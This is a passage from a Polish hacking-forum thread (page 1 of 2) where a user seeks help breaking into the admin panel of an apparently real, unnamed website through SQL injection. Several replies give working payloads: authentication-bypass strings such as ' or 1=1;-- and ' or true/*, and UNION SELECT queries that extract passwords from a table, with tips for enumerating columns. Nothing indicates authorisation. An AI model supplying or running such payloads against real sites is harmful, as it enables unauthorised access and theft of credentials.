Strona 1 z 2 12 OstatniOstatni
Pokaż wyniki 1 do 10 z 13

Temat: SQL Injection action=menu

  1. #1
    Zarejestrowany
    Oct 2009
    Postów
    5

    Domyślnie SQL Injection action=menu

    Witam!
    Sprawdzam pewną stronę z prostym php, ale sobię nie radzę, więc pytanie kieruję tu. Serwer wysyła zapytanie w ten sposób (chyba standardowo) xxx.pl/admin/index.php?action=menu&user=&pass=
    Dopisuję po user ' i pass '. Wywala błąd.

    Cholera, błąd
    ["select pass from xxxx.hasla where user=''';"]
    [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1]

    Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /Library/WebServer/Documents/cos/admin/index.php on line 11

    SQL Exploiter wpisuję górny adres, wyszukuję table name, column values. Wszystko znajduje, podaje login adminid i haslo apwd. Co dalej? Login i haslo nie działa, dane przez program query tez nie, bo mimo przejścia logowania nie możemy wejśc w menu administracyjne. Po kliknięciu strona jakby się jedynie odświeża.

    Pewnie to głupie i banalnie proste, ale uciesze się bardzo jeśli ktoś pomoże.
    Adresu nie podobam.
    Pozdrawiam

  2. #2
    Zarejestrowany
    Aug 2009
    Postów
    408

    Domyślnie

    zakomentuj albo podaj adres

  3. #3
    Zarejestrowany
    Jun 2006
    Skąd
    rand(.eu)
    Postów
    8,748

    Domyślnie

    1. o ile pamietam MySQL nie pozwala na ; w zapytaniu
    2. fajnie zobaczyc ze serwer dziala na OS X
    ctrl-alt-del.cc - soft reset site for IT admins and other staff :-)

  4. #4
    Zarejestrowany
    Jul 2008
    Skąd
    /dev/random
    Postów
    556

    Domyślnie

    cos w ten desen user=dupa' or 1=1;--
    --
    ToM's Super Fix IT "No Fucking Problem"

  5. #5
    Zarejestrowany
    Aug 2009
    Postów
    408

    Domyślnie

    tom to jest mysql.
    czyli nie -- tylko /*

    a zamiast 1=1 mozna dac true

    ' or true/*

  6. #6
    Zarejestrowany
    Oct 2009
    Postów
    5

    Domyślnie

    /wiecej.php?id=120%20union%20select%201,pass,3,4,5, 6,7,8,9,10,11,12,13%20from%20xxx.hasla/*

    Doszedłem do czegoś takiego, przy 13 tabeli przestało mi wywalac błąd. Nazwę tabeli i kolumny miałem podaną w błędzie. xxx.hasla i user. Nazwa tabeli się zgadza, przy user i pass też nie wyskakuje błąd, ale mimo wszystko nic mi nie wypisuje z tabeli na ekran. O co może chodzic? Tabele są po prostu puste?
    Pozdrawiam

  7. #7
    Zarejestrowany
    Aug 2009
    Postów
    408

    Domyślnie

    sprobuj tak:

    120 and 0 union select 0,pass,0,0,0,0,0,0,0,0,0,0,0 from xxx.hasla/*

    zaieniaj zera z drgiej czesci na pass, az dostaniesz wynik.
    jesli natomiast php limituje do 1, to uzyj limit 0,100, 1,100, 2,100...
    i pojedynczo wyciagasz dane.

  8. #8
    Zarejestrowany
    Oct 2009
    Postów
    5

    Domyślnie

    Cytat Napisał rax666 Zobacz post
    sprobuj tak:

    120 and 0 union select 0,pass,0,0,0,0,0,0,0,0,0,0,0 from xxx.hasla/*

    zaieniaj zera z drgiej czesci na pass, az dostaniesz wynik.
    Masz u mnie piwo. Dziekuje.
    A co jeśli strona jest podatna na tego typu ataki, ale liczba tabel jest jakaś wysoka? Np, do 30 nie znajduje nic.
    Pozdrawiam
    Ostatnio edytowane przez asta : 10-22-2009 - 08:27

  9. #9
    Zarejestrowany
    Aug 2009
    Postów
    408

    Domyślnie

    A co jeśli strona jest podatna na tego typu ataki, ale liczba tabel jest jakaś wysoka? Np, do 30 nie znajduje nic.
    musisz sie przekonac czy aby napewno jest podatna.

    ja mam kilka swoich sposobow.
    najprosciej jak dostaniwsz czarno na bialym 'mysql error in line, syntax error '.
    ale czasem poprostu przenosi lub nic niema.
    trzeba ustalic czy jest cast na int, sprawdzanie typu, ciezko to powiedziec.


    mysle ze jestes skazany na siebie, jak stronka jest dla ciebie wazna i nie podasz adresu to nikt ci nie udzieli szczegolow.
    znajdz cos innego i probuj az sie nauczysz. a najlepiej to postaw serwer u siebie.

  10. #10
    Zarejestrowany
    Jul 2008
    Skąd
    /dev/random
    Postów
    556

    Domyślnie

    Cytat Napisał rax666 Zobacz post
    tom to jest mysql.
    czyli nie -- tylko /*

    a zamiast 1=1 mozna dac true

    ' or true/*
    w mysql mozna uzywac -- (przynajmniej od wersji 4.x dziala), co do tego ze mozna uzyc true to wiem, ale zapis 1=1 jest czytelniejszy dla kogos kto zaczyna zabawe...
    Ostatnio edytowane przez tom : 10-22-2009 - 11:57
    --
    ToM's Super Fix IT "No Fucking Problem"

Strona 1 z 2 12 OstatniOstatni

Podobne wątki

  1. Sql Injection
    By xbitdesigns in forum Inne metody
    Odpowiedzi: 2
    Autor: 01-03-2015, 09:06
  2. SQL Injection
    By dam645 in forum Hacking
    Odpowiedzi: 7
    Autor: 06-18-2009, 09:28
  3. SQL Injection
    By BlueV in forum Newbie - dla początkujących!
    Odpowiedzi: 5
    Autor: 03-03-2009, 07:45
  4. SQL injection
    By Quers in forum Newbie - dla początkujących!
    Odpowiedzi: 4
    Autor: 06-30-2008, 05:22
  5. sql injection
    By h3x in forum Hacking
    Odpowiedzi: 4
    Autor: 05-15-2008, 17:48

Zasady Postowania

  • Nie możesz zakładać nowych tematów
  • Nie możesz pisać wiadomości
  • Nie możesz dodawać załączników
  • Nie możesz edytować swoich postów
  •  
Subskrybuj